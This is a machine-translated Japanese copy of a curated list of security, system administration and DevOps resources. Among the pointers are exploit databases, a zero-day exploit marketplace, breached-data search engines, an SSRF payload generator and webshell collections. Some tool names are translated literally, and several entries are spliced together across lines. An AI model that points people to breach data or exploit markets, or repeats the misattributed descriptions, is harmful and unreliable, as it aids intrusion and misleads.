🔸InQuest Labs- InQuest Labsは、セキュリティ研究者向けのオープンでインタラクティブなAPI駆動型データポータルです。

▪️発電 機

  🔸この人は存在しません-ワンクリックで偽の顔を生成します-無限の可能性。
🔸AI生成写真-100.000AI生成顔。
🔸偽名ジェネレーター-ランダムに生成されたID。
🔸Intigriti Redirector-リダイレクト/ SSRFペイロードジェネレーターを開きます。

▪️パスワード

  🔸私は殴られましたか?-データ侵害で侵害されたアカウントがあるかどうかを確認します。
🔸dehashed-ハッキングされたデータベース検索エンジンです。
🔸リークされたソース-ルックアップの形でオンラインで見つかったデータのコラボレーションです。

▪️CVE/エクスプロイトデータベース

  🔸CVEマイター-公に知られているサイバーセキュリティの脆弱性のリスト。
🔸CVEの詳細-CVEセキュリティの脆弱性の高度なデータベース。
🔸公開エクスプロイトと対応する脆弱なソフトウェアのDB-CVE準拠のアーカイブを悪用します。
🔸0day.today-エクスプロイト市場は、ゼロデイエクスプロイトを売買する可能性を提供します。
🔸スプロイトス-エクスプロイトとツールのデータベース。
🔸CXセキュリティ-無料の脆弱性データベース。
🔸Vulncode-DB- は、脆弱性とそれに対応するソースコード (利用可能な場合) のデータベースです。
🔸CVEデータ用のcveapi-無料のAPI。

▪️モバイルアプリスキャナー

  🔸ImmuniWeb® Mobile App Scanner-モバイルアプリ(iOSおよびAndroid)のセキュリティとプライバシーをテストします。
🔸Quixxi- 無料のモバイルアプリ脆弱性スキャナー for Android & iOS.
🔸Ostorlab-モバイルアプリケーションを分析して、脆弱性と潜在的な弱点を特定します。

▪️プライベート検索エンジン

  🔸スタートページ-世界で最もプライベートな検索エンジン。
🔸searX-プライバシーを尊重し、ハッキング可能なメタ検索エンジン。
🔸ダークサーチ - 最初の本物のダークウェブ検索エンジン。
🔸Qwant-あなたのプライバシーを尊重する検索エンジン。
🔸ダックダックゴー - あなたを追跡しない検索エンジン。
🔸スイス-プライバシーセーフウェブ検索切断-検索
🔸を匿名化する検索エンジン。
🔸MetaGer-匿名プロキシと非表示のTorブランチを使用する検索エンジン。

▪️安全なウェブメールプロバイダー

  🔸カウンターメール - 最大限のセキュリティとプライバシーを提供するように設計されたオンライン電子メールサービス。
🔸Mail2Tor-は、誰でも匿名で電子メールを送受信できるTor隠しサービスです。
🔸Tutanota-は世界で最も安全なメールサービスで、驚くほど使いやすいです。
🔸Protonmail-は、CERNとMITの科学者によって開発された世界最大の安全な電子メールサービスです。
🔸Startmail - プライベートで暗号化された電子メールが簡単になりました。

▪️隠れ

  🔸キーベース-オープンソースであり、公開鍵暗号を利用しています。

▪️PGP キーサーバ

  🔸SKS OpenPGP Key server - OpenPGP が使用する SKS キーサーバ用のサービス。

システム/サービス[目次]

▪️オペレーティングシステム

  🔸Slackware - 最も「Unixライクな」Linuxディストリビューション。
🔸OpenBSD - マルチプラットフォームの 4.4BSD ベースの UNIX ライクなオペレーティングシステム。
🔸HardenedBSD - HardenedBSD は、革新的なエクスプロイトの軽減とセキュリティソリューションを実装することを目的としています。
🔸Kali Linux-侵入テスト、倫理的ハッキング、ネットワークセキュリティ評価に使用されるLinuxディストリビューション。
🔸Parrot Security OS - サイバーセキュリティGNU/Linux環境。
🔸バックボックスLinux-侵入テストとセキュリティ評価指向のUbuntuベースのLinuxディストリビューション。
🔸BlackArch- は、ペネトレーションテスター向けの Arch Linux ベースのペネトレーションテストディストリビューションです。
🔸Pentoo- は Gentoo をベースにしたセキュリティ重視のライブ CD です。
🔸セキュリティオニオン-侵入検知、エンタープライズセキュリティ監視、およびログ管理用のLinuxディストリビューション。
🔸Tails-は、プライバシーと匿名性を保護することを目的としたライブシステムです。
🔸vedetta- OpenBSD ルータの定型文。
🔸Qubes OSは、Xenベースの仮想化を使用するセキュリティ指向のOSです。

▪️HTTP サービス

  🔸ワニスキャッシュ-コンテンツの多い動的Webサイト用に設計されたHTTPアクセラレータ。
🔸Nginx-Apacheに似ていますが、非常に軽量なオープンソースのWebおよびリバースプロキシサーバー。
🔸OpenResty- は、NGINX と LuaJIT をベースにした動的なウェブプラットフォームです。
🔸Tengine-いくつかの高度な機能を備えたNginxのディストリビューション。
🔸キャディサーバー-は、デフォルトでHTTPSを備えたオープンソースのHTTP / 2対応Webサーバーです。
🔸HAProxy-信頼性が高く、高性能なTCP/HTTPロードバランサー。

▪️DNS サービス

  🔸バインドされていない - 検証、再帰、およびキャッシュ DNS リゾルバー (TLS を使用)。
🔸Knot Resolver-リゾルバーライブラリとデーモンの両方を含む完全なリゾルバー実装をキャッシュします。
🔸PowerDNS-はオープンソースの権威DNSサーバーであり、C ++で記述され、GPLの下でライセンスされています。

▪️その他のサービス

  🔸3プロキシ-小さな無料のプロキシサーバー。

▪️セキュリティ/強化

  🔸エメラルドオニオン-は、501(c)(3)非営利団体であり、トランジットインターネットサービスプロバイダー(ISP)です。
🔸パイホール-パイホール®は、不要なコンテンツからデバイスを保護するDNSシンクホールです。
🔸マルトレイル-悪意のあるトラフィック検出システム。
🔸security_monkey- AWS、GCP、OpenStack、GitHub の各組織で、アセットとその経時的な変化を監視します。
🔸爆竹-サーバーレスコンピューティング用の安全で高速なマイクロVM。
🔸streisand-選択したWireGuard、OpenSSH、OpenVPNなどを実行する新しいサーバーをセットアップします。

ネットワーク[目次]

▪️ツール

  🔸CapAnalysis-キャプチャされた大量のネットワークトラフィックを分析するためのWebビジュアルツール(PCAPアナライザー)。
🔸ネットボックス-IPアドレス管理(IPAM)およびデータセンターインフラストラクチャ管理(DCIM)ツール。

▪️ラボ

  🔸NREラボ-それを行うことで自動化を学びます。今、ここで、あなたのブラウザで。

▪️その他 __________

  🔸LBNLのネットワーク研究グループ - ネットワーク研究グループ(NRG)のホームページ。

コンテナ/オーケストレーション[TOC]

▪️CLI ツール

  🔸gvisor- コンテナランタイムサンドボックス。
🔸CTOP-コンテナメトリック用のトップのようなインターフェイス。

▪️ウェブツール

  🔸Moby-コンテナベースのシステムを組み立てるためのコンテナエコシステムの共同プロジェクト。
🔸Traefik-オープンソースのリバースプロキシ/ロードバランサーは、DockerおよびLet's Encryptとの統合を容易にします。
🔸kong- クラウドネイティブAPIゲートウェイ。
🔸牧場主-完全なコンテナ管理プラットフォーム。
🔸ポーテイナー-ドッカーの管理を容易にします。
🔸nginx-proxy-docker-gen を使用した Docker コンテナ用の自動化された nginx プロキシ。
🔸バンカー化された-nginx- nginxのDockerイメージ「デフォルトで安全」。

▪️安全

  🔸ドッカーベンチセキュリティ-Dockerのデプロイに関する数十の一般的なベストプラクティスをチェックします。
🔸trivy-CIに適したコンテナ用の脆弱性スキャナー。
🔸Harbor - コンテンツを保存、署名、スキャンするクラウドネイティブレジストリプロジェクト。
🔸Houdini - ネットワーク侵入のための何百もの攻撃的で有用なドッカーイメージ。

▪️マニュアル/チュートリアル/ベストプラクティス

  🔸ドッカーチートシート-ドッカーのクイックリファレンスチートシート
🔸素晴らしい-ドッカー-ドッカーのリソースとプロジェクトの厳選されたリスト。
🔸docker_practice-実際のDevOpsプラクティスを使用して、Dockerテクノロジーを学び、理解してください!
🔸labs-は、さまざまなツールでDockerを使用する方法を学習するためのチュートリアルのコレクションです。
🔸ドッカーファイル-デスクトップとサーバーで使用するさまざまなドッカーファイル
🔸Kubernetes-the-hard-way- Kubernetes を Google Cloud Platform でハードな方法でブートストラップします。スクリプトはありません。
🔸Kubernetes-the-easy-way- Kubernetes を Google Cloud Platform で簡単な方法でブートストラップします。スクリプトはありません。
🔸チートシート-kubernetes-A4- A4のKubernetesチートシート。
🔸K8S-セキュリティ-Kubernetesのセキュリティに関する注意事項とベストプラクティス。
🔸kubernetes-本番環境のベストプラクティス-本番環境に対応したKubernetesのベストプラクティスを含むチェックリスト。
🔸Kubernetes-本番環境のベストプラクティス-Kubernetesセキュリティ-ベストプラクティスガイド。
🔸kubernetes-failure-stories-は、Kubernetesに関連するパブリックな失敗/ホラーストーリーをまとめたものです。

マニュアル/ハウツー/チュートリアル[目次]

▪️シェル/コマンドライン

  🔸ピュアバッシュ聖書は、外部プロセスに代わる純粋なバッシュのコレクションです。
🔸pure-sh-bible- は、外部プロセスに対する純粋な POSIX sh の代替手段のコレクションです。
🔸バッシュガイド-はバッシュを学ぶためのガイドです。
🔸バッシュハンドブック-バッシュを学びたい人のために。
🔸Bash Hackers Wiki は、GNU Bash に関するあらゆる種類のドキュメントを保持しています。
🔸Shell & Utilities- POSIX 準拠のシステムによってアプリケーションプログラムに提供されるコマンドを記述します。
🔸コマンドラインの芸術-コマンドラインを1ページでマスターします。
🔸シェルスタイルガイド-Googleが作成したオープンソースプロジェクト向けのシェルスタイルガイド

▪️テキストエディタ

  🔸Vimチートシート-素晴らしい多言語vimガイド。

▪️ニシキヘビ

  🔸素晴らしいPython-素晴らしいPythonフレームワーク、ライブラリ、ソフトウェア、およびリソースの厳選されたリスト。
🔸python-cheatsheet-包括的なPythonチートシート。
🔸pythoncheatsheet.org-初心者および上級開発者向けの基本的なリファレンス。

▪️ Sed & Awk & Other

  🔸うんうん!- 高度なsedとawkの使用法(ペンテスター3の解析)。

▪️ *nix & Network

  🔸nixCraft-新規およびベテランのシステム管理者向けのLinuxおよびUnixチュートリアル。
🔸TecMint - システム管理者とオタクのための理想的なLinuxブログ。
🔸オムニセクフリーのネットワーキング、システム管理、セキュリティのチュートリアル。
🔸Linux-チート- Linuxのチュートリアルとチートシート。最小限の例。主にユーザーランドCLIユーティリティ。
🔸LinuxUpSkillChallenge-システム管理者に必要なスキルを学びます。
🔸Unixツールボックス-IT作業または上級ユーザーに役立つUnix / Linux / BSDコマンドおよびタスク。
🔸Linuxカーネルティーチング-は、講義とラボのLinuxカーネルトピックのコレクションです。
🔸htopの説明-Linuxのhtop / topで見ることができるすべての説明。
🔸Linuxガイドとヒント-FedoraおよびCentOSでのシステム管理に関するチュートリアル。
🔸ストレース-リトルブック-ストレースを紹介する小さな本。
🔸Linuxトレースワークショップ-Linuxトレースツールワークショップの例とハンズオンラボ。
🔸http2-説明済み-HTTP/2を説明し、文書化する詳細なドキュメント。
🔸http3-説明済み- HTTP/3 および QUIC プロトコルを記述したドキュメント。
🔸HTTP/2 in Action-新しいHTTP/2標準の優れた入門書。
🔸TCP / IPスタックをコーディングしましょう-ネットワークとシステムのプログラミングをより深いレベルで学ぶための素晴らしいものです。
🔸Nginx管理者ハンドブック-NGINXのパフォーマンス、セキュリティ、およびその他の重要なことを改善する方法。
🔸nginxconfig.io- ステロイドのNGINX構成ジェネレータ。
🔸opensshガイドライン-OpenSSHサーバーとクライアントの構成で運用チームを支援することです。
🔸SSHハンドシェイクの説明-SSHハンドシェイクの比較的簡単な説明です。
🔸ISCのナレッジベース- BIND 9、ISC DHCP、およびKea DHCPに関する一般的な情報を見つけることができます。
🔸PacketLife.net-シスコのCCNP認定のために勉強しながらメモを記録する場所。

▪️マイクロソフト

  🔸AD攻撃防御-最新のポストエクスプロイトアクティビティを使用してアクティブディレクトリを攻撃し、防御します。

▪️大規模システム

  🔸システム設計入門-大規模システムの設計方法を学びます。
🔸優れたスケーラビリティ - 高スケーラビリティ、高可用性、高安定性などを構築するためのベストプラクティス。
🔸Webアーキテクチャ101-基本的なアーキテクチャの概念。

▪️システム強化

  🔸CISベンチマーク-無料のPDFとして利用可能な100を超えるテクノロジーの安全な構成設定。
🔸セキュリティ強化CentOS 7- これは、CentOSのセキュリティ強化に必要な手順を順を追って説明します。
🔸CentOS 7サーバー強化ガイド - CentOSを強化するための優れたガイド。OpenSCAPに精通しています。
🔸awesome-セキュリティ強化-は、セキュリティ強化ガイド、ツール、およびその他のリソースのコレクションです。
🔸実用的なLinux強化ガイド-GNU / Linuxシステムの強化の概要を提供します。
🔸Linux強化ガイド-セキュリティとプライバシーのためにLinuxを可能な限り強化する方法。

▪️セキュリティとプライバシー

  🔸ハッキング記事 - LRaj Chandel's Security & Hacking Blog.
🔸AWSセキュリティツール-AWSクラウド環境をより安全にします。
🔸Rawsecのサイバーセキュリティインベントリ-サイバーセキュリティに関するツールとリソースのインベントリ。
🔸図解されたTLS接続-TLS接続のすべてのバイトが説明および再現されました。
🔸SSL リサーチ - SSL ラボによる SSL および TLS 展開のベスト プラクティス。
🔸SELinux ゲーム - 実践することで SELinux を学びます。パズルを解き、スキルを表示します。
🔸証明書とPKI-証明書とPKIについて知っておくべきことすべてですが、恐れすぎて尋ねることができません。
🔸サブドメイン列挙の技術-サブドメイン列挙技術のリファレンス。
🔸グーグルをやめる - グーグルをやめるための包括的なガイド。

▪️ウェブアプリ

  🔸OWASP - ソフトウェアのセキュリティの向上に焦点を当てた世界的な非営利慈善団体。
🔸OWASP ASVS 3.0.1- OWASP Application Security Verification Standard Project.
🔸OWASP ASVS 3.0.1 ウェブアプリ - 開発者が ASVS の要件を理解するのに役立つシンプルなウェブアプリ。
🔸OWASP ASVS 4.0-は、アプリケーションのセキュリティ要件またはテストのリストです。
🔸OWASPテストガイドv4-「ベストプラクティス」侵入テストフレームワークが含まれています。
🔸OWASP開発者ガイド-これはOWASP開発者ガイドの開発バージョンです。
🔸OWASP WSTGは、Webアプリケーションのセキュリティをテストするための包括的なオープンソースガイドです.
🔸OWASP APIセキュリティプロジェクト-は、APIセキュリティの上位10の脆弱性に特に焦点を当てています。
🔸Mozilla Web Security - 運用チームが安全な Web アプリケーションを作成するのを支援します。
🔸セキュリティ速報-Netflixオープンソースに関連するセキュリティ速報
🔸API-セキュリティ-チェックリスト-APIを設計、テスト、およびリリースする際のセキュリティ対策。
🔸CORS を有効にする - クロスオリジンリソース共有を有効にします。
🔸アプリケーションセキュリティWiki-は、すべてのアプリケーションセキュリティ関連リソースを1か所で提供するイニシアチブです。
🔸奇妙なプロキシ-リバースプロキシ関連の攻撃。これは、さまざまなプロキシの分析の結果です。
🔸Webshells-悪意のあるペイロードに関する素晴らしいシリーズ。
🔸実用的なWebキャッシュポイズニング-難解なWeb機能を使用してWebサイトを侵害する方法を示します。
🔸隠しディレクトリとファイル-Webアプリケーションに関する機密情報のソースとして。
🔸爆発的なブログ-サイバーセックとペンテストに関する素晴らしいブログ。
🔸セキュリティクッキー - このホワイトペーパーでは、クッキーのセキュリティについて詳しく見ていきます。
🔸APISecurityBestPractices-シークレット(APIキー、db資格情報、証明書)をソースコードから除外するのに役立ちます。

▪️オールインワン

  🔸LZoneチートシート-すべてのチートシート。
🔸ダンのチートシートの-大規模なチートシートのドキュメント。
🔸リコのチートシート-これはチートシートの控えめなコレクションです。
🔸DevDocs API - 複数の API ドキュメントを、高速で整理された検索可能なインターフェイスに組み合わせます。
🔸cheat.sh-必要な唯一のチートシート。
🔸gnulinux.guru- bash、vim、ネットワーキングに関するチートシートのコレクション。
🔸Webスキル-Web開発者として学ぶのに役立つスキルの視覚的な概要。

▪️電子ブック

  🔸無料のプログラミングブック-多くの言語での無料の学習リソースのリスト。

▪️その他 __________

  🔸CTFシリーズ:脆弱なマシン-以下の手順に従って、脆弱性とエクスプロイトを見つけることができます。
🔸50M_CTF_Writeup-ハッカーローンから5000万ドルのCTF-書き込み。
🔸ctf-tasks-長年にわたって開発された低レベルのCTFチャレンジのアーカイブ。
🔸RE /マルウェア分析を開始するにはどうすればよいですか?- 初心者のためのいくつかのヒントと便利なリンクのコレクション。
🔸C10Kの問題-Webサーバーが1万のクライアントを同時に処理する時が来たと思いませんか?
🔸1500バイトがインターネットのMTUになった方法-最大伝送ユニットについての素晴らしい話。
🔸dtraceのような貧乏人のプロファイラは、どのプログラムがブロックしているかを確認するためのメソッドを実際に提供していません。
🔸スタックオーバーフローでのHTTPS-これは、SSLの実装に関する長い旅の物語です。
🔸Julia's Drawings-プログラミングとUnixの世界に関するいくつかの図面、システムとデバッグツールに関するzine。
🔸ハッシュ衝突-この優れたリポジトリは、ハッシュ衝突の悪用に焦点を当てています。
🔸sha256-アニメーション-ターミナルでのSHA-256ハッシュ関数のアニメーション。
🔸SHA256アルゴリズム-SHA256アルゴリズムは、オンラインで段階的に視覚的に説明されています。
🔸BGPと猫の出会い-BGPを3072時間操作した後、ジョブスナイダースはニャンキャットを描くことに成功しました。
🔸BGP-戦艦-BGPで戦艦をプレイします。
🔸次の場合に何が起こるか...- ブラウザに google.com を入力してEnterキーを押しますか?
🔸どのように-ウェブ-作品-「いつ何が起こるか...」に基づいていますリポジトリ。
🔸現実世界のHTTPS-優れたチュートリアルでは、HTTPSが現実の世界でどのように機能するかを説明します。
🔸Gitlab と NFS のバグ - Linux カーネルで NFS のバグを探すのに 2 週間を費やした方法。
🔸Gitlabは、2017年1月31日のデータベース停止の事後分析を、私たちが学んだ教訓で解消しました。
🔸ハッカーになる方法-ハッカーになりたい場合は、読み続けてください。
🔸CPUの操作コスト-CPUクロックでの特定の操作のコストを見積もるのに役立つはずです。
🔸単純なデータベースを構築しましょう-C.simple-computer
🔸でSQLiteクローンを最初から書く-コンピュータが内部でどのように機能するかを理解するための素晴らしいリソース。
🔸「私は殴られたのか」の物語- Azure テーブル ストレージで 1 億 5,400 万件のレコードを操作します。
🔸TOP500スーパーコンピューター-私たちに知られている500の最も強力な市販のコンピューターシステムを示しています。
🔸8 GPUパスワードクラッカーを構築する方法-任意の「黒魔術」またはhデスクトップコンポーネント
🔸のようなフラストレーションの私たちのCERNデータセンター-CERNコンピューティング環境(およびその他)の3D視覚化。
🔸私のデータベースはどれほどめちゃくちゃですか-この便利なウェブサイトであなたのデータベースがどれほどめちゃくちゃになっているかを評価してください。
🔸Linuxトラブルシューティング101、2016年版-すべてがDNSの問題です...
🔸5つのなぜ-あなたは問題が何であるかを知っていますが、それを解決することはできませんか?
🔸Maersk, me & notPetya- ランサムウェアはどのようにして何百ものドメインコントローラーを乗っ取ることに成功したのか?
🔸どのようにhttps.works- HTTPSがどのように機能するか...コミックで!
🔸howdns.works-DNSがどのように機能するかについての楽しくカラフルな説明。
🔸POSTGRESQLCO.NF - あなたのpostgresql.confのドキュメントと推奨事項。

インスパイアリングリスト[目次]

▪️ SysOps/DevOps

  🔸素晴らしいシステム管理者-驚くほど素晴らしいオープンソースのシステム管理者リソース。
🔸素晴らしいシェル-素晴らしいコマンドラインフレームワーク、ツールキット、ガイド、ギズモ。
🔸コマンドラインテキスト処理-検索および置換するテキストの検索、美化への並べ替えなど。
🔸素晴らしいPcaptools-ネットワークトレースを処理するために他の研究者によって開発されたツールのコレクション。
🔸素晴らしい-ebpf-eBPFに関連する素晴らしいプロジェクトの厳選されたリスト。
🔸Linuxネットワークパフォーマンス-ネットワークシステム変数の一部がLinux /カーネルネットワークフローに適合します。
🔸素晴らしいPostgres-素晴らしいPostgreSQLソフトウェア、ライブラリ、ツール、リソースのリスト。
🔸クイックSQLチートシート-すべてのSQLクエリとその使用方法の例を簡単に思い出させます。
🔸ローカルでホストできるフリーソフトウェアのネットワークサービスとWebアプリケーションの素晴らしいセルフホストリスト。
🔸アプリケーションのリスト-パッケージを探している人のためのリファレンスとして、カテゴリ別にソートされたアプリの膨大なリスト。
🔸CS-インタビュー-ナレッジマップ-最高のインタビューマップを作成します。
🔸DevOps-ガイド-インタビューの質問とメモを備えた基本から上級までのDevOpsガイド
🔸FreeBSD Journal - FreeBSD やその他の重要な事柄に関する定期刊行物の素晴らしいリストです。
🔸DevOps-インタビュー-質問-には、DevOpsおよびSRE関連のさまざまなトピックに関するインタビューの質問が含まれています。

▪️開発者

  🔸Web開発者ロードマップ-パスの選択、学習、改善に役立つロードマップ、記事、およびリソース。
🔸フロントエンドチェックリスト-最新のWebサイトや細心の注意を払った開発者に最適なフロントエンドチェックリスト。
🔸フロントエンドパフォーマンスチェックリスト-他のものよりも高速に実行されるフロントエンドパフォーマンスチェックリスト
🔸Pythonのマジックメソッド-マジックメソッドとは何ですか?それらはすべてオブジェクト指向のPythonです。
🔸wtfpython-驚くべきPythonスニペットとあまり知られていない機能のコレクション。
🔸js-dev-reads- 目の肥えたウェブ開発者が読むべき本や記事のリスト。
🔸コミットメッセージガイド-コミットメッセージの重要性を理解するためのガイド。

▪️セキュリティ/ペネトレーションテスト

  🔸素晴らしいWebセキュリティ-Webセキュリティの資料とリソースの厳選されたリスト。
🔸素晴らしい-サイバースキル-サイバースキルをトレーニングできるハッキング環境の厳選されたリスト。
🔸Awesome-DevSecops-素晴らしいDevSecOpsツールの権威あるリスト。
🔸awesome-osint-は、驚くほど素晴らしいOSINTの厳選されたリストです。
🔸HolyTips-バグバウンティハンティングとWebアプリのセキュリティに関するヒントとチュートリアル。
🔸素晴らしい脅威インテリジェンス-素晴らしい脅威インテリジェンスリソースの厳選されたリスト。
🔸レッドチームツールキット-レッドチームの運用を支援するオープンソースおよび商用ツールのコレクション。
🔸素晴らしいげっぷエクステンション-驚くほど素晴らしいげっぷ拡張機能の厳選されたリスト。
🔸無料のセキュリティ電子書籍-無料のセキュリティとハッキングの電子書籍のリスト。
🔸Hacking-Security-ebooks- Top 100 Hacking & Security E-Books.
🔸プライバシーを尊重する-プライバシーを尊重するサービスとソフトウェアの厳選されたリスト。
🔸リバースエンジニアリング-素晴らしいリバースエンジニアリングリソースのリスト。
🔸Linux-RE-101- Linuxリバースエンジニアリングのためのリソースのコレクション。
🔸リバースエンジニアリング-読書リスト-リバースエンジニアリングの記事、書籍、および論文のリスト。
🔸素晴らしいWAF-素晴らしいWebアプリケーションファイアウォール(WAF)のものの厳選されたリスト。
🔸素晴らしい-shodan-queries-shodan.io プラグインするための興味深く、面白くて、憂鬱な検索クエリ。
🔸RobotsDisallowed-最も一般的で最も興味深いロボット.txt許可されていないディレクトリの厳選されたリスト。
🔸ハッキングニューラルネットワーク-ニューラルネットワークの悪用と防御に関する小さなコースです。
🔸ワイルドカード証明書-ワイルドカード証明書を使用すべきではない理由。
🔸VPNサービスを使用しないでください-これはすべてのサードパーティの「VPNプロバイダー」が行うことです。
🔸素晴らしいYARA-素晴らしいYARAのルール、ツール、および人々の厳選されたリスト。
🔸macOS-セキュリティとプライバシーガイド-macOSのプライバシーを保護および改善するためのガイド。
🔸macos_security- macOSセキュリティコンプライアンスプロジェクト。
🔸awesome-sec-talks-は、素晴らしいセキュリティトークのコレクションリストです。
🔸ハッカーのための映画-すべてのハッカーとサイバーパンクが見なければならない映画のリスト。
🔸Cryptography_1-ダンボネスタンフォードクリプトコースを受講中に使用された資料。
🔸Crypton-攻撃的および防御的な暗号化を学び、実践するためのライブラリ。

▪️その他 __________

  🔸チートグラフィ-3,000を超える無料のチートシート、改訂支援、クイックリファレンス。
🔸すべてのプログラミング言語用の素晴らしい静的分析ツール。
🔸コンピュータサイエンス-コンピュータサイエンスの無料の独学教育への道。
🔸事後分析 - 事後分析 (構成エラー、ハードウェア障害など) のコレクションです。
🔸自分で構築する-独自のX-構築(ここにテクノロジーを挿入)。
🔸Project-based-Tutorials-in-C-は、C.The-Documentation-Compendium
🔸-さまざまなREADMEテンプレートと高品質のドキュメントを作成するためのヒントにあるプロジェクトベースのチュートリアルの厳選されたリストです。
🔸素晴らしい-Python-アプリケーション-素晴らしい動作をするフリーソフトウェアであり、オープンソースのPythonでもあります。
🔸素晴らしい-パブリック-データセット-HQオープンデータセットのトピック中心のリスト。
🔸機械学習アルゴリズム-すべての機械学習アルゴリズムと概念の厳選されたリスト。

ブログ/ポッドキャスト/ビデオ[目次]

▪️ SysOps/DevOps

  🔸PHP開発者のためのワニス - マティアス・ジェニアールによるワニスの非常に興味深いプレゼンテーション。
🔸マイクロサービスのNetflixガイド-Netflixの混沌とした活気に満ちたマイクロサービスの世界について話します。

▪️開発者

  🔸Cとマシン言語の比較 - 単純なCアプリケーションをそのプログラムのコンパイルされたマシンコードと比較します。

▪️オタクな人

  🔸ブレンダン・グレッグのブログは、コンピューティングパフォーマンスとクラウドコンピューティングの業界専門家です。
🔸Gynvael "GynDream" Coldwindは、GoogleのITセキュリティエンジニアです。
🔸Michał "lcamtuf" Zalewski-ホワイトハットハッカー、コンピュータセキュリティの専門家。
🔸マティアス・ジェニアール-開発者、システム管理者、ブロガー、ポッドキャスター、パブリックスピーカー。
🔸Nick Craver-スタックエクスチェンジのソフトウェア開発者およびシステム管理者。
🔸スコットヘルム-セキュリティ研究者、講演者、securityheaders.com と report-uri.com の創設者。
🔸ブライアン・クレブス-ワシントンポスト、現在は独立した調査ジャーナリスト。
🔸ブルースシュナイアー-は、「セキュリティの第一人者」と呼ばれる国際的に有名なセキュリティ技術者です。
🔸クリッシーモーガン-実践的な学習の提唱者であるクリッシーは、バグ報奨金プログラムにも参加しています。
🔸Andy Gill-は、上級侵入テスターとして働く本質的にハッカーです。
🔸ダニエル・ミースラー-サイバーセキュリティの専門家兼ライター。
🔸サミー・カムカーは、アメリカのプライバシーとセキュリティの研究者であり、コンピューターハッカーです。
🔸Javvad Malik-は、AlienVaultのセキュリティ擁護者であり、ブロガーのイベントスピーカーであり、業界コメンテーターです。
🔸グラハム・クルーリー-講演者および独立したコンピューターセキュリティアナリスト。
🔸Kacper Szurek-ESETの検出エンジニア。
🔸トロイハント-公教育とセキュリティトピックに関するアウトリーチで知られるWebセキュリティの専門家。
🔸raymii.org- 高可用性クラウド環境の構築に特化したシステム管理者。
🔸ロバートペンツ-ITセキュリティの専門家。

▪️オタクブログ

  🔸Linux Audit-マイケル・ボーレンによる監査、強化、コンプライアンスに関するLinuxセキュリティブログ。
🔸Linuxセキュリティエキスパート-トレーニング、ハウツー、チェックリスト、セキュリティツールなど。
🔸グリモア-魔法使いのための有用な呪文のコレクション、あなたはコンピューターの魔法使い、魔術師などです。
🔸Secjuice-は、情報セキュリティ分野で唯一の非営利、独立した、ボランティア主導の出版物です。
🔸解読-情報を提供し、刺激するセキュリティニュース。

▪️オタクベンダーブログ

  🔸Tenableポッドキャスト-サイバーエクスポージャーなどに関連する会話やインタビュー。
🔸ソフォス-コンピュータセキュリティの問題に関するニュース、意見、アドバイス、調査を提供する脅威ニュースルーム。
🔸Tripwire State of Security - 現在のセキュリティ問題に関する最新ニュース、トレンド、洞察を特集したブログ。
🔸Malwarebytesラボブログ-セキュリティブログは、サイバーセキュリティに関するインサイダーニュースを提供することを目的としています。
🔸TrustedSec-サイバーセキュリティに関する最新ニュースとトレンド。
🔸PortSwiggerウェブセキュリティブログ - ウェブアプリケーションのセキュリティの脆弱性とウェブセキュリティの私たちのチームからのトップのヒントについて。
🔸AT&T Cybersecurity ブログ - 新たな脅威に関するニュースと、脅威の検出を簡素化するための実用的なアドバイス。
🔸サイコティック-CISOとIT管理者が業界のトレンド、ITセキュリティなどについて学ぶために来る場所。

▪️オタクサイバーセキュリティポッドキャスト

  🔸危険なビジネス-は、ニュースと詳細なインタビューを特集した毎週の情報セキュリティポッドキャストです。
🔸サイバー、マザーボードによる-ストーリー、およびサイバーセキュリティに関するアイデアに焦点を当てています。
🔸Tenableポッドキャスト-サイバーエクスポージャーなどに関連する会話やインタビュー。
🔸サイバー犯罪調査-サイバー犯罪に関するジェフホワイトによるポッドキャスト。
🔸多くの帽子クラブ-幅広いInfosecの人々(ホワイトハット、グレイハット、ブラックハット)からの物語を特集しています。
🔸ダークネット日記-インターネットのダークサイドからの実話。
🔸OSINT好奇心ウェブキャスト-人々がOSINTで成功するのに役立つ調査の好奇心です。
🔸セキュリティウィークリー-最新の情報セキュリティとハッキングのニュース。

▪️オタクサイバーセキュリティビデオブログ

  🔸rev3rse セキュリティ - 攻撃的、バイナリエクスプロイト、Web アプリケーションのセキュリティ、強化、レッドチーム、ブルーチーム。
🔸LiveOverflow-有料のオンラインコースで通常提供されるものよりもはるかに高度なトピックですが、無料です。
🔸J4vv4D-インターネットセキュリティに関する重要な情報。
🔸サイバートーク-サイバーセキュリティに関する講演、インタビュー、記事。

▪️最高の個人用ツイッターアカウント

  🔸 @blackroomsec-ホワイトハットハッカー/ペンテスター。銀河間掃海艇チャンピオン1990。
🔸 @MarcoCiappelli- ITセキュリティと社会の交差点にある共同創設者@ITSPmagazine。
🔸 @binitamshah- Linuxエバンジェリスト。マルウェア。カーネル開発セキュリティ愛好家。
🔸 @joe_carson-情報セキュリティプロフェッショナルおよび技術オタク。
🔸 @mikko-エフセキュアのCRO、リバースエンジニア、TEDスピーカー、スーパーヴィラン。
🔸 @esrtweet-しばしばESRと呼ばれ、アメリカのソフトウェア開発者であり、オープンソースソフトウェアの擁護者です。
🔸 @gynvael-セキュリティ研究者/プログラマー、@DragonSectorCTF創設者/プレーヤー、テクニカルストリーマー。
🔸 @x0rz- セキュリティ研究者&サイバーオブザーバー。
🔸 @hasherezade-プログラマー、マルウェアアナリスト。PEbear, PEsieve, libPeConvの著者。
🔸 @TinkerSec-いじくり回し、サイファーパンク、ハッカー。
🔸 @alisaesage-独立したハッカーおよび研究者。
🔸 @SwiftOnSecurity-システムセキュリティ、産業安全、システム管理者、decentsecurity.com の著者。
🔸 @dakami-は、DNSルートキーを復元する権限を持つわずか7人のうちの1人です。
🔸 @samykamkar-は有名な「グレイハット」ハッカー、セキュリティ研究者、MySpace「Samy」ワームの作成者です。
🔸 @securityweekly- Security Weeklyポッドキャストネットワークの創設者兼CTOです。
🔸 @jack_daniel- @SecurityBSides共同創設者。
🔸 @thegrugq- セキュリティ研究者。
🔸 @matthew_d_green-ジョンズホプキンス大学の暗号学者および教授。

▪️最高の商用ツイッターアカウント

  🔸 @haveibeenpwned-データ侵害で侵害されたアカウントがあるかどうかを確認します。
🔸 @bugcrowd-他のどのクラウドソーシングセキュリティプラットフォームよりも多くのフォーチュン500から信頼されています。
🔸 @Malwarebytes-最も信頼できるセキュリティ会社。比類のない脅威の可視性。
🔸 @sansforensics-世界をリードするデジタルフォレンジックおよびインシデント対応プロバイダー。
🔸 @attcyber- AT&T Cybersecurityのエッジツーエッジテクノロジーは、脅威インテリジェンスなどを提供します。
